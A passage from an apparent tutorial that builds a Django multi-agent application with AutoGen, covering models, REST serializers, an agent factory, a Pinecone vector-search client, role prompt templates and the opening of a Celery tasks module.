141 is_active = models.BooleanField(default=True)
142
143 # Metadata
144 topic = models.CharField(max_length=100, blank=True)
145 summary = models.TextField(blank=True)
146
147 class Meta:
148 ordering = ['-updated_at']
149
150 def __str__(self):
151 return self.title or f"Conversation {self.id}"
152
153class Message(models.Model):
154 """Model for storing messages within a conversation."""
155 ROLE_CHOICES = (
156 ('user', 'User'),
157 ('assistant', 'Assistant'),
158 ('system', 'System'),
159 )
160
161 id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
162 conversation = models.ForeignKey(Conversation, on_delete=models.CASCADE, related_name='messages')
163 role = models.CharField(max_length=10, choices=ROLE_CHOICES)
164 content = models.TextField()
165 created_at = models.DateTimeField(auto_now_add=True)
166
167 # Metadata
168 token_count = models.IntegerField(default=0)
169
170 # References to agents if applicable
171 agent_name = models.CharField(max_length=100, blank=True, null=True)
172
173 class Meta:
174 ordering = ['created_at']
175
176 def __str__(self):
177 return f"{self.role} message in {self.conversation}"
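
The cost estimate in `set_completed` is simple arithmetic, shown here as a worked example. Because `estimated_cost` is a `DecimalField` with six decimal places, this sketch does the calculation with `Decimal` rather than floats. The per-1,000-token rates are the ones given in the model's comments and are assumptions for illustration only, since actual pricing depends on the model and changes over time. `estimate_cost` is a hypothetical helper, not part of the model above.

```python
from decimal import Decimal

# Rates taken from the comments in set_completed (USD per 1,000 tokens); assumed values
PROMPT_RATE_PER_1K = Decimal("0.0015")
COMPLETION_RATE_PER_1K = Decimal("0.002")


def estimate_cost(prompt_tokens: int, completion_tokens: int) -> Decimal:
    """Return the estimated cost in USD, rounded to six decimal places."""
    cost = (
        Decimal(prompt_tokens) * PROMPT_RATE_PER_1K
        + Decimal(completion_tokens) * COMPLETION_RATE_PER_1K
    ) / Decimal(1000)
    return cost.quantize(Decimal("0.000001"))


# 1,200 prompt tokens and 350 completion tokens:
# (1200 * 0.0015 + 350 * 0.002) / 1000 = (1.8 + 0.7) / 1000 = 0.0025
example_cost = estimate_cost(1200, 350)
print(example_cost)
```

Quantizing to six places matches the field's `decimal_places=6`, so the stored value and the computed value agree exactly.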

Now let's implement the serializers for our API:

python
1# agent_app/serializers.py
2from rest_framework import serializers
3from .models import AgentTask, KnowledgeItem, Conversation, Message
4from django.contrib.auth.models import User
5
6class UserSerializer(serializers.ModelSerializer):
7 class Meta:
8 model = User
9 fields = ['id', 'username', 'email', 'first_name', 'last_name']
10
11class AgentTaskSerializer(serializers.ModelSerializer):
12 user = UserSerializer(read_only=True)
13 duration = serializers.SerializerMethodField()
14
15 class Meta:
16 model = AgentTask
17 fields = [
18 'id', 'user', 'title', 'description', 'task_type', 'status',
19 'priority', 'input_data', 'result_data', 'error_message',
20 'created_at', 'updated_at', 'started_at', 'completed_at',
21 'prompt_tokens', 'completion_tokens', 'total_tokens',
22 'estimated_cost', 'duration'
23 ]
24 read_only_fields = [
25 'id', 'status', 'result_data', 'error_message', 'created_at',
26 'updated_at', 'started_at', 'completed_at', 'prompt_tokens',
27 'completion_tokens', 'total_tokens', 'estimated_cost'
28 ]
29
30 def get_duration(self, obj):
31 """Calculate task duration in seconds if available."""
32 if obj.started_at and obj.completed_at:
33 return (obj.completed_at - obj.started_at).total_seconds()
34 return None
35
36 def create(self, validated_data):
37 """Create a new agent task associated with the current user."""
38 user = self.context['request'].user
39 validated_data['user'] = user
40 return super().create(validated_data)
41
42class KnowledgeItemSerializer(serializers.ModelSerializer):
43 user = UserSerializer(read_only=True)
44
45 class Meta:
46 model = KnowledgeItem
47 fields = [
48 'id', 'user', 'title', 'content', 'source', 'domain',
49 'tags', 'vector_id', 'embedding_model', 'last_updated',
50 'relevance_score', 'confidence', 'created_at'
51 ]
52 read_only_fields = [
53 'id', 'vector_id', 'embedding_model', 'last_updated',
54 'created_at'
55 ]
56
57 def create(self, validated_data):
58 """Create a new knowledge item associated with the current user."""
59 user = self.context['request'].user
60 validated_data['user'] = user
61 return super().create(validated_data)
62
63class MessageSerializer(serializers.ModelSerializer):
64 class Meta:
65 model = Message
66 fields = [
67 'id', 'conversation', 'role', 'content', 'created_at',
68 'token_count', 'agent_name'
69 ]
70 read_only_fields = ['id', 'created_at', 'token_count']
71
72class ConversationSerializer(serializers.ModelSerializer):
73 user = UserSerializer(read_only=True)
74 messages = MessageSerializer(many=True, read_only=True)
75 message_count = serializers.SerializerMethodField()
76
77 class Meta:
78 model = Conversation
79 fields = [
80 'id', 'user', 'title', 'created_at', 'updated_at',
81 'is_active', 'topic', 'summary', 'messages', 'message_count'
82 ]
83 read_only_fields = ['id', 'created_at', 'updated_at']
84
85 def get_message_count(self, obj):
86 return obj.messages.count()
87
88 def create(self, validated_data):
89 """Create a new conversation associated with the current user."""
90 user = self.context['request'].user
91 validated_data['user'] = user
92 return super().create(validated_data)
93
94class ConversationMessageSerializer(serializers.Serializer):
95 """Serializer for adding a message to a conversation."""
96 content = serializers.CharField(required=True)
97 role = serializers.ChoiceField(choices=['user', 'system'], default='user')

Next, let's implement the agent utilities:

python
1# agent_app/utils/agent_factory.py
2import os
3import autogen
4import logging
5from django.conf import settings
6from .pinecone_client import PineconeClient
7from .prompt_templates import get_system_prompt
8
9logger = logging.getLogger('agent_app')
10
11class AgentFactory:
12 """Factory class for creating different types of agents."""
13
14 def __init__(self, user_id=None):
15 self.user_id = user_id
16 self.pinecone_client = PineconeClient()
17
18 def get_config_list(self, model="gpt-4"):
19 """Get LLM configuration list."""
20 return [
21 {
22 "model": model,
23 "api_key": settings.OPENAI_API_KEY
24 }
25 ]
26
27 def create_agent(self, agent_type, context=None):
28 """Create an agent based on the specified type."""
29 if agent_type == "researcher":
30 return self._create_researcher_agent(context)
31 elif agent_type == "analyst":
32 return self._create_analyst_agent(context)
33 elif agent_type == "document_processor":
34 return self._create_document_processor_agent(context)
35 elif agent_type == "conversation":
36 return self._create_conversation_agent(context)
37 else:
38 # Default to a generic assistant agent
39 return self._create_generic_agent(context)
40
41 def create_agent_team(self, task_data):
42 """Create a team of agents for complex tasks."""
43 task_type = task_data.get('task_type')
44
45 if task_type == 'research':
46 return self._create_research_team(task_data)
47 elif task_type == 'analysis':
48 return self._create_analysis_team(task_data)
49 else:
50 # Default team configuration
51 return self._create_default_team(task_data)
52
53 def _create_researcher_agent(self, context=None):
54 """Create a researcher agent specialized in information gathering."""
55 system_message = get_system_prompt("researcher")
56
57 if context:
58 domain = context.get('domain', '')
59 if domain:
60 system_message += f"\nYou are specialized in researching {domain}."
61
62 # Define research-specific functions
63 functions = [
64 {
65 "name": "search_knowledge_base",
66 "description": "Search the knowledge base for relevant information",
67 "parameters": {
68 "type": "object",
69 "properties": {
70 "query": {"type": "string", "description": "The search query"},
71 "domain": {"type": "string", "description": "Optional domain to filter results"},
72 "limit": {"type": "integer", "description": "Maximum number of results to return"}
73 },
74 "required": ["query"]
75 }
76 },
77 {
78 "name": "summarize_sources",
79 "description": "Summarize information from multiple sources",
80 "parameters": {
81 "type": "object",
82 "properties": {
83 "sources": {"type": "array", "items": {"type": "string"}, "description": "List of source texts to summarize"},
84 "max_length": {"type": "integer", "description": "Maximum length of the summary"}
85 },
86 "required": ["sources"]
87 }
88 }
89 ]
90
91 # Create the agent with appropriate configuration
92 agent = autogen.AssistantAgent(
93 name="ResearchAgent",
94 system_message=system_message,
95 llm_config={
96 "config_list": self.get_config_list(),
97 "functions": functions,
98 "temperature": 0.5,
99 "timeout": 600, # 10 minutes timeout for research tasks
100 "cache_seed": None # No caching for research tasks
101 }
102 )
103
104 return agent
105
106 def _create_analyst_agent(self, context=None):
107 """Create an analyst agent specialized in data interpretation."""
108 system_message = get_system_prompt("analyst")
109
110 if context:
111 data_type = context.get('data_type', '')
112 if data_type:
113 system_message += f"\nYou are specialized in analyzing {data_type} data."
114
115 # Define analysis-specific functions
116 functions = [
117 {
118 "name": "analyze_data",
119 "description": "Analyze data and provide insights",
120 "parameters": {
121 "type": "object",
122 "properties": {
123 "data": {"type": "object", "description": "The data to analyze"},
124 "metrics": {"type": "array", "items": {"type": "string"}, "description": "Metrics to calculate"},
125 "visualization": {"type": "boolean", "description": "Whether to suggest visualizations"}
126 },
127 "required": ["data"]
128 }
129 },
130 {
131 "name": "generate_report",
132 "description": "Generate a structured report from analysis",
133 "parameters": {
134 "type": "object",
135 "properties": {
136 "analysis_results": {"type": "object", "description": "Results from data analysis"},
137 "format": {"type": "string", "description": "Report format (e.g., executive, technical)"},
138 "sections": {"type": "array", "items": {"type": "string"}, "description": "Sections to include in the report"}
139 },
140 "required": ["analysis_results"]
141 }
142 }
143 ]
144
145 # Create the agent with appropriate configuration
146 agent = autogen.AssistantAgent(
147 name="AnalystAgent",
148 system_message=system_message,
149 llm_config={
150 "config_list": self.get_config_list("gpt-4"), # Use GPT-4 for analysis
151 "functions": functions,
152 "temperature": 0.3, # Lower temperature for more precise analysis
153 "timeout": 900, # 15 minutes timeout for analysis tasks
154 "cache_seed": None # No caching for analysis tasks
155 }
156 )
157
158 return agent
159
    def _create_document_processor_agent(self, context=None):
        """Create an agent specialized in document processing."""
        system_message = get_system_prompt("document_processor")

        if context:
            doc_type = context.get('document_type', '')
            if doc_type:
                system_message += f"\nYou are specialized in processing {doc_type} documents."

        # Define document processing functions
        functions = [
            {
                "name": "extract_entities",
                "description": "Extract named entities from text",
                "parameters": {
                    "type": "object",
                    "properties": {
                        "text": {"type": "string", "description": "The text to analyze"},
                        "entity_types": {"type": "array", "items": {"type": "string"}, "description": "Types of entities to extract"}
                    },
                    "required": ["text"]
                }
            },
            {
                "name": "classify_document",
                "description": "Classify document by type and content",
                "parameters": {
                    "type": "object",
                    "properties": {
                        "text": {"type": "string", "description": "The document text"},
                        "categories": {"type": "array", "items": {"type": "string"}, "description": "Possible categories"}
                    },
                    "required": ["text"]
                }
            },
            {
                "name": "summarize_document",
                "description": "Create a concise summary of a document",
                "parameters": {
                    "type": "object",
                    "properties": {
                        "text": {"type": "string", "description": "The document text"},
                        "max_length": {"type": "integer", "description": "Maximum summary length"}
                    },
                    "required": ["text"]
                }
            }
        ]

        # Create the agent with appropriate configuration
        agent = autogen.AssistantAgent(
            name="DocumentAgent",
            system_message=system_message,
            llm_config={
                "config_list": self.get_config_list(),
                "functions": functions,
                "temperature": 0.2,  # Lower temperature for precision
                "timeout": 300,  # 5 minutes timeout
                "cache_seed": 42  # Use caching for document tasks
            }
        )

        return agent

    def _create_conversation_agent(self, context=None):
        """Create an agent for interactive conversations."""
        system_message = get_system_prompt("conversation")

        if context:
            tone = context.get('tone', '')
            topic = context.get('topic', '')
            if tone:
                system_message += f"\nMaintain a {tone} tone in your responses."
            if topic:
                system_message += f"\nYou are specialized in discussing {topic}."

        # Create the agent with conversation-appropriate configuration
        agent = autogen.AssistantAgent(
            name="ConversationAgent",
            system_message=system_message,
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.7,  # Higher temperature for more creative conversations
                "timeout": 120,  # 2 minutes timeout for conversational responses
                "cache_seed": None  # No caching for unique conversations
            }
        )

        return agent

    def _create_generic_agent(self, context=None):
        """Create a general-purpose assistant agent."""
        system_message = get_system_prompt("generic")

        # Create a versatile, general-purpose agent
        agent = autogen.AssistantAgent(
            name="AssistantAgent",
            system_message=system_message,
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.5,
                "timeout": 180,  # 3 minutes timeout
                "cache_seed": None  # No caching
            }
        )

        return agent

    def _create_research_team(self, task_data):
        """Create a team of agents for research tasks."""
        # Create specialized agents for the research team
        researcher = self._create_researcher_agent({"domain": task_data.get("domain")})
        analyst = self._create_analyst_agent({"data_type": "research findings"})
        writer = autogen.AssistantAgent(
            name="WriterAgent",
            system_message=get_system_prompt("writer"),
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.7,
                "timeout": 300
            }
        )

        # Create a user proxy that will coordinate the team
        user_proxy = autogen.UserProxyAgent(
            name="ResearchCoordinator",
            human_input_mode="NEVER",
            max_consecutive_auto_reply=10,
            code_execution_config={"work_dir": "research_workspace"}
        )

        # Create a group chat for the research team
        groupchat = autogen.GroupChat(
            agents=[user_proxy, researcher, analyst, writer],
            messages=[],
            max_round=15
        )

        manager = autogen.GroupChatManager(
            groupchat=groupchat,
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.2
            }
        )

        return {
            "user_proxy": user_proxy,
            "manager": manager,
            "agents": [researcher, analyst, writer],
            "groupchat": groupchat
        }

    def _create_analysis_team(self, task_data):
        """Create a team of agents for data analysis tasks."""
        # Create specialized agents for the analysis team
        data_processor = autogen.AssistantAgent(
            name="DataProcessor",
            system_message=get_system_prompt("data_processor"),
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.2,
                "timeout": 300
            }
        )

        analyst = self._create_analyst_agent({"data_type": task_data.get("data_type", "general")})

        visualization_expert = autogen.AssistantAgent(
            name="VisualizationExpert",
            system_message=get_system_prompt("visualization"),
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.4,
                "timeout": 300
            }
        )

        report_writer = autogen.AssistantAgent(
            name="ReportWriter",
            system_message=get_system_prompt("report_writer"),
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.6,
                "timeout": 300
            }
        )

        # Create a user proxy that will coordinate the team
        user_proxy = autogen.UserProxyAgent(
            name="AnalysisCoordinator",
            human_input_mode="NEVER",
            max_consecutive_auto_reply=10,
            code_execution_config={"work_dir": "analysis_workspace"}
        )

        # Create a group chat for the analysis team
        groupchat = autogen.GroupChat(
            agents=[user_proxy, data_processor, analyst, visualization_expert, report_writer],
            messages=[],
            max_round=15
        )

        manager = autogen.GroupChatManager(
            groupchat=groupchat,
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.2
            }
        )

        return {
            "user_proxy": user_proxy,
            "manager": manager,
            "agents": [data_processor, analyst, visualization_expert, report_writer],
            "groupchat": groupchat
        }

    def _create_default_team(self, task_data):
        """Create a default team of agents for general tasks."""
        # Create generic agents for a default team
        planner = autogen.AssistantAgent(
            name="PlannerAgent",
            system_message=get_system_prompt("planner"),
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.3,
                "timeout": 300
            }
        )

        executor = autogen.AssistantAgent(
            name="ExecutorAgent",
            system_message=get_system_prompt("executor"),
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.5,
                "timeout": 300
            }
        )

        reviewer = autogen.AssistantAgent(
            name="ReviewerAgent",
            system_message=get_system_prompt("reviewer"),
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.2,
                "timeout": 300
            }
        )

        # Create a user proxy that will coordinate the team
        user_proxy = autogen.UserProxyAgent(
            name="TaskCoordinator",
            human_input_mode="NEVER",
            max_consecutive_auto_reply=10,
            code_execution_config={"work_dir": "task_workspace"}
        )

        # Create a group chat for the default team
        groupchat = autogen.GroupChat(
            agents=[user_proxy, planner, executor, reviewer],
            messages=[],
            max_round=10
        )

        manager = autogen.GroupChatManager(
            groupchat=groupchat,
            llm_config={
                "config_list": self.get_config_list(),
                "temperature": 0.3
            }
        )

        return {
            "user_proxy": user_proxy,
            "manager": manager,
            "agents": [planner, executor, reviewer],
            "groupchat": groupchat
        }
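
The factory methods repeat the same `llm_config` dictionary with small variations in temperature, timeout, functions, and caching. One way to reduce that duplication might look like the following minimal sketch. The helper name `build_llm_config` and the placeholder config list are assumptions for illustration; neither is part of AutoGen or of the factory class.

```python
from typing import Any, Dict, List, Optional


def build_llm_config(
    config_list: List[Dict[str, Any]],
    temperature: float = 0.5,
    timeout: int = 300,
    functions: Optional[List[Dict[str, Any]]] = None,
    cache_seed: Optional[int] = None,
) -> Dict[str, Any]:
    """Assemble an llm_config dict using the same keys as the factory methods."""
    llm_config: Dict[str, Any] = {
        "config_list": config_list,
        "temperature": temperature,
        "timeout": timeout,
        "cache_seed": cache_seed,
    }
    # Only attach function schemas when the agent actually declares some.
    if functions:
        llm_config["functions"] = functions
    return llm_config


# Placeholder config list, for illustration only.
example_config_list = [{"model": "gpt-4", "api_key": "sk-placeholder"}]

analyst_config = build_llm_config(example_config_list, temperature=0.3, timeout=900)
document_config = build_llm_config(
    example_config_list,
    temperature=0.2,
    functions=[{"name": "summarize_document"}],
    cache_seed=42,
)
print(sorted(analyst_config))
print(sorted(document_config))
```

This sketch always sets `cache_seed`, whereas several team agents in the factory omit the key and so inherit the library default. A real refactor would need to preserve that distinction.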
python
# agent_app/utils/pinecone_client.py
# Note: this client targets the legacy SDK entry points pinecone.init()
# (pinecone-client 2.x) and openai.Embedding (openai < 1.0). Later major
# releases of both SDKs removed these interfaces.
import logging
import time

import openai
import pinecone
from django.conf import settings

logger = logging.getLogger('agent_app')

class PineconeClient:
    """Client for interacting with Pinecone vector database."""

    def __init__(self):
        self.api_key = settings.PINECONE_API_KEY
        self.environment = settings.PINECONE_ENVIRONMENT
        self.index_name = settings.PINECONE_INDEX_NAME
        self.dimension = 1536  # Dimension of text-embedding-ada-002 vectors
        self.initialize_pinecone()

    def initialize_pinecone(self):
        """Initialize Pinecone and ensure index exists."""
        try:
            pinecone.init(api_key=self.api_key, environment=self.environment)

            # Check if index exists, if not create it
            if self.index_name not in pinecone.list_indexes():
                logger.info(f"Creating Pinecone index: {self.index_name}")
                pinecone.create_index(
                    name=self.index_name,
                    dimension=self.dimension,
                    metric="cosine",
                    shards=1
                )
                # Wait for index to be ready (fixed delay; index creation may take longer)
                time.sleep(10)

            self.index = pinecone.Index(self.index_name)
            logger.info(f"Connected to Pinecone index: {self.index_name}")

        except Exception as e:
            logger.error(f"Error initializing Pinecone: {str(e)}")
            raise

    def get_embedding(self, text):
        """Get embedding for text using OpenAI API."""
        try:
            response = openai.Embedding.create(
                input=text,
                model="text-embedding-ada-002"
            )
            return response["data"][0]["embedding"]
        except Exception as e:
            logger.error(f"Error generating embedding: {str(e)}")
            raise

    def add_item(self, item_id, text, metadata=None):
        """Add an item to the vector database."""
        try:
            # Get text embedding
            embedding = self.get_embedding(text)

            # Prepare metadata
            if metadata is None:
                metadata = {}

            # Add text to metadata for retrieval
            metadata["text"] = text

            # Upsert vector to Pinecone
            self.index.upsert(
                vectors=[(item_id, embedding, metadata)]
            )

            logger.info(f"Added item {item_id} to Pinecone")
            return item_id

        except Exception as e:
            logger.error(f"Error adding item to Pinecone: {str(e)}")
            raise

    def delete_item(self, item_id):
        """Delete an item from the vector database."""
        try:
            self.index.delete(ids=[item_id])
            logger.info(f"Deleted item {item_id} from Pinecone")
            return True
        except Exception as e:
            logger.error(f"Error deleting item from Pinecone: {str(e)}")
            raise

    def search(self, query, filters=None, top_k=5):
        """Search for similar items in the vector database."""
        try:
            # Get query embedding
            query_embedding = self.get_embedding(query)

            # Perform vector similarity search
            results = self.index.query(
                vector=query_embedding,
                top_k=top_k,
                include_metadata=True,
                filter=filters
            )

            # Format results
            formatted_results = []
            for match in results.matches:
                formatted_results.append({
                    "id": match.id,
                    "score": match.score,
                    "text": match.metadata.get("text", ""),
                    "metadata": {k: v for k, v in match.metadata.items() if k != "text"}
                })

            return formatted_results

        except Exception as e:
            logger.error(f"Error searching Pinecone: {str(e)}")
            raise

    def update_metadata(self, item_id, metadata):
        """Update metadata for an existing item."""
        try:
            # Get current vector and metadata
            vector_data = self.index.fetch([item_id])

            if item_id not in vector_data.vectors:
                logger.error(f"Item {item_id} not found in Pinecone")
                return False

            # Extract the vector and current metadata
            record = vector_data.vectors[item_id]
            current_vector = record.values
            # A record stored without metadata would otherwise break the merge below
            current_metadata = getattr(record, "metadata", None) or {}

            # Update metadata (new keys override existing ones)
            updated_metadata = {**current_metadata, **metadata}

            # Upsert with updated metadata
            self.index.upsert(
                vectors=[(item_id, current_vector, updated_metadata)]
            )

            logger.info(f"Updated metadata for item {item_id}")
            return True

        except Exception as e:
            logger.error(f"Error updating metadata in Pinecone: {str(e)}")
            raise

    def get_stats(self):
        """Get statistics about the index."""
        try:
            stats = self.index.describe_index_stats()
            return {
                "namespaces": stats.get("namespaces", {}),
                "dimension": stats.get("dimension"),
                "total_vector_count": stats.get("total_vector_count")
            }
        except Exception as e:
            logger.error(f"Error getting Pinecone stats: {str(e)}")
            raise
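
`initialize_pinecone` waits a fixed 10 seconds after creating an index, which may be too short or needlessly long depending on the environment. A polling loop with a timeout is one alternative. The sketch below is library-agnostic: `wait_until` and `fake_index_ready` are hypothetical names, and the stand-in predicate would have to be replaced by a real readiness check against the Pinecone SDK, which is not shown here.

```python
import time
from typing import Callable


def wait_until(predicate: Callable[[], bool], timeout: float = 60.0, interval: float = 1.0) -> bool:
    """Poll `predicate` until it returns True or `timeout` seconds elapse."""
    deadline = time.monotonic() + timeout
    while True:
        if predicate():
            return True
        if time.monotonic() >= deadline:
            return False
        time.sleep(interval)


# Stand-in for a real readiness check: reports ready on the third call.
calls = {"count": 0}


def fake_index_ready() -> bool:
    calls["count"] += 1
    return calls["count"] >= 3


ready = wait_until(fake_index_ready, timeout=5.0, interval=0.01)
print(ready, calls["count"])

# A predicate that never succeeds returns False once the timeout passes.
timed_out = wait_until(lambda: False, timeout=0.05, interval=0.01)
print(timed_out)
```

Returning a boolean rather than raising lets the caller decide whether a slow index is fatal or merely worth a log entry.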
python
# agent_app/utils/prompt_templates.py
"""
Prompt templates for various agent types.
"""

def get_system_prompt(agent_type):
    """
    Get the system prompt for a specific agent type.

    Args:
        agent_type (str): The type of agent

    Returns:
        str: The system prompt
    """
    prompts = {
        "researcher": """You are an expert research agent who specializes in gathering comprehensive information on any topic. Your strength is in finding relevant information, evaluating sources, and synthesizing findings.

Your capabilities:
1. Conduct thorough research on any given topic
2. Evaluate the credibility and relevance of sources
3. Identify key information and insights
4. Synthesize findings into clear, structured formats
5. Properly cite and attribute information to sources
6. Identify gaps in available information

When researching:
- Always begin by assessing what specific information is needed
- Consider multiple perspectives and sources
- Remain objective and unbiased
- Distinguish between facts, expert opinions, and uncertain claims
- Structure your findings in a logical manner
- Note limitations in available information

Your goal is to provide the most accurate, comprehensive, and well-organized research possible.""",

        "analyst": """You are an expert data analyst agent who excels at interpreting and deriving insights from complex data. Your strength is in statistical analysis, pattern recognition, and communicating findings clearly.

Your capabilities:
1. Analyze numerical and categorical data
2. Identify trends, patterns, and anomalies
3. Apply appropriate statistical methods to datasets
4. Generate actionable insights from analysis
5. Create clear interpretations of analytical results
6. Make data-driven recommendations

When analyzing:
- First understand the context and objectives of the analysis
- Consider what methods are most appropriate for the data type
- Identify key metrics and indicators that address the objectives
- Look for correlations, trends, and outliers
- Consider statistical significance and confidence levels
- Communicate findings in clear, non-technical terms when needed
- Always disclose limitations and uncertainty in your analysis

Your goal is to transform raw data into valuable insights and recommendations.""",

        "document_processor": """You are an expert document processing agent who specializes in analyzing, summarizing, and extracting information from documents. Your strength is in understanding document structure, identifying key information, and producing accurate analyses.

Your capabilities:
1. Extract key information from documents
2. Summarize document content at different levels of detail
3. Identify main themes, arguments, and conclusions
4. Recognize document structure and organization
5. Classify documents by type, purpose, and content
6. Extract named entities and relationships

When processing documents:
- First identify the document type and purpose
- Consider the document's structure and organization
- Identify the most important sections and content
- Extract key information, claims, and evidence
- Recognize the tone, style, and intended audience
- Maintain the original meaning and context
- Be precise in your extraction and summarization

Your goal is to accurately process documents and make their information accessible and useful.""",

        "conversation": """You are an expert conversation agent who excels at engaging in natural, helpful dialogue. Your strength is in understanding user needs, providing relevant information, and maintaining engaging interactions.

Your capabilities:
1. Engage in natural, flowing conversation
2. Understand explicit and implicit user questions
3. Provide clear, concise, and accurate information
4. Adapt your tone and style to match the user
5. Ask clarifying questions when needed
6. Remember context throughout a conversation

During conversations:
- Listen carefully to understand the user's full intent
- Provide helpful, relevant responses
- Be concise but complete in your answers
- Maintain a consistent tone and personality
- Ask questions when needed for clarification
- Acknowledge when you don't know something
- Structure complex information clearly

Your goal is to provide an engaging, helpful, and informative conversation experience.""",

        "generic": """You are a versatile assistant agent capable of handling a wide range of tasks. You can provide information, answer questions, offer suggestions, and assist with various needs.

Your capabilities:
1. Answer questions across diverse domains
2. Provide explanations and clarifications
3. Offer suggestions and recommendations
4. Help with planning and organization
5. Assist with creative tasks
6. Engage in thoughtful discussion

When assisting:
- Understand the core request or question
- Provide clear, accurate, and helpful responses
- Consider the context and intent behind questions
- Structure your responses logically
- Be honest about your limitations
- Maintain a helpful and supportive tone

Your goal is to be a versatile, reliable, and helpful assistant.""",

        "writer": """You are an expert writing agent who specializes in creating clear, engaging, and well-structured content. Your strength is in adapting your writing style to different purposes and audiences.

Your capabilities:
1. Create clear and engaging content in various formats
2. Adapt writing style to different audiences and purposes
3. Structure content logically and coherently
4. Edit and refine existing content
5. Ensure grammar, spelling, and stylistic consistency
6. Generate creative and original content

When writing:
- Consider the purpose, audience, and context
- Organize information with a clear structure
- Use appropriate tone, style, and vocabulary
- Create engaging introductions and conclusions
- Use transitions to guide readers through the content
- Revise for clarity, conciseness, and impact

Your goal is to produce high-quality written content that effectively communicates ideas to the intended audience.""",

        "data_processor": """You are an expert data processing agent who specializes in preparing, cleaning, and transforming data for analysis. Your strength is in handling raw data and making it ready for meaningful analysis.

Your capabilities:
1. Clean and normalize messy datasets
2. Handle missing, duplicate, or inconsistent data
3. Transform data into appropriate formats
4. Merge and join datasets from multiple sources
5. Create derived features and variables
6. Identify and address data quality issues

When processing data:
- First assess the data structure and quality
- Identify issues that need to be addressed
- Apply appropriate cleaning and transformation methods
- Document all changes made to the original data
- Validate the processed data for accuracy
- Prepare the data in a format suitable for analysis

Your goal is to transform raw data into a clean, consistent, and analysis-ready format.""",

        "visualization": """You are an expert data visualization agent who specializes in creating effective visual representations of data. Your strength is in selecting and designing visualizations that clearly communicate insights.

Your capabilities:
1. Select appropriate visualization types for different data
2. Design clear, informative visual representations
3. Highlight key patterns, trends, and relationships in data
4. Create accessible and intuitive visualizations
5. Adapt visualizations for different audiences
6. Combine multiple visualizations into dashboards

When creating visualizations:
- Consider the data type and relationships to visualize
- Select the most appropriate chart or graph type
- Focus on clearly communicating the main insights
- Minimize clutter and maximize data-ink ratio
- Use color, labels, and annotations effectively
- Consider accessibility and interpretability
- Provide clear titles, legends, and context

Your goal is to create visualizations that effectively communicate data insights in an accessible and impactful way.""",

        "report_writer": """You are an expert report writing agent who specializes in creating comprehensive, structured reports that effectively communicate findings and insights. Your strength is in organizing information logically and presenting it clearly.

Your capabilities:
1. Create well-structured reports for different purposes
2. Organize findings and insights logically
3. Present complex information clearly and concisely
4. Integrate data, analysis, and visualizations
5. Adapt content and style to different audiences
6. Highlight key findings and recommendations

When writing reports:
- Consider the purpose, audience, and required detail level
- Create a logical structure with clear sections
- Begin with an executive summary of key points
- Present findings with supporting evidence
- Use visuals to complement and enhance text
- Maintain consistent formatting and style
- Conclude with clear insights and recommendations

Your goal is to produce comprehensive, clear reports that effectively communicate information to the intended audience.""",

        "planner": """You are an expert planning agent who specializes in breaking down complex tasks into organized, achievable steps. Your strength is in creating structured plans that lead to successful outcomes.

Your capabilities:
1. Break down complex tasks into manageable steps
2. Identify dependencies between tasks
3. Estimate time and resources needed
4. Prioritize tasks based on importance and urgency
5. Identify potential risks and mitigation strategies
6. Adapt plans as circumstances change

When planning:
- First understand the overall goal and constraints
- Identify all necessary tasks and subtasks
- Determine logical sequence and dependencies
- Allocate appropriate time and resources
- Highlight critical path items and bottlenecks
- Include checkpoints to assess progress
- Anticipate potential obstacles and plan alternatives

Your goal is to create clear, achievable plans that efficiently lead to successful outcomes.""",

        "executor": """You are an expert execution agent who specializes in implementing plans and completing tasks. Your strength is in taking action, solving problems, and delivering results.

Your capabilities:
1. Implement plans and complete assigned tasks
2. Follow procedures and instructions precisely
3. Solve problems that arise during execution
4. Adapt to changing circumstances
5. Manage resources efficiently
6. Document actions and results

When executing:
- Review and understand the task requirements
- Gather necessary resources and information
- Follow established procedures and best practices
- Address issues promptly as they arise
- Document progress and completed work
- Communicate status and any obstacles clearly
- Verify that outcomes meet requirements

Your goal is to effectively implement plans and deliver high-quality results.""",

        "reviewer": """You are an expert review agent who specializes in evaluating work and providing constructive feedback. Your strength is in assessing quality, identifying issues, and suggesting improvements.

Your capabilities:
1. Evaluate work against established criteria and standards
2. Identify strengths and weaknesses
3. Detect errors, inconsistencies, and problems
4. Ensure compliance with requirements
5. Provide specific, actionable feedback
6. Suggest concrete improvements

When reviewing:
- First understand the requirements and context
- Evaluate objectively against clear criteria
- Be thorough and systematic in your assessment
- Provide balanced feedback on strengths and weaknesses
- Be specific about issues and why they matter
- Suggest clear, actionable improvements
- Maintain a constructive and helpful tone

Your goal is to improve quality through thorough evaluation and constructive feedback.""",
    }

    return prompts.get(agent_type, prompts["generic"])
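
Because `get_system_prompt` falls back to the generic prompt for any unknown key, a misspelled agent type would silently produce a generic agent. A minimal sketch of a stricter lookup that logs the fallback is shown here. The function name `get_system_prompt_checked` and the shortened `PROMPTS` dictionary are stand-ins for illustration, not part of the module above.

```python
import logging

logger = logging.getLogger("agent_app")

# Shortened stand-ins for the full prompt texts.
PROMPTS = {
    "generic": "You are a versatile assistant agent.",
    "planner": "You are an expert planning agent.",
}


def get_system_prompt_checked(agent_type: str, prompts: dict = PROMPTS) -> str:
    """Return the prompt for `agent_type`, warning when falling back to 'generic'."""
    if agent_type not in prompts:
        logger.warning("Unknown agent type %r; using the generic prompt", agent_type)
        return prompts["generic"]
    return prompts[agent_type]


known = get_system_prompt_checked("planner")
fallback = get_system_prompt_checked("planer")  # typo falls back to the generic prompt
print(known)
print(fallback)
```

The behavior matches the original for valid keys; the only difference is that the fallback path now leaves a trace in the logs.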

Now let's implement the Celery tasks:

python
# agent_app/tasks.py
import time
import json
import logging
import traceback

import autogen  # Needed by process_individual_task for UserProxyAgent
from django.utils import timezone
from django.conf import settings
from celery import shared_task
from celery.exceptions import SoftTimeLimitExceeded
from .models import AgentTask, KnowledgeItem, Conversation, Message
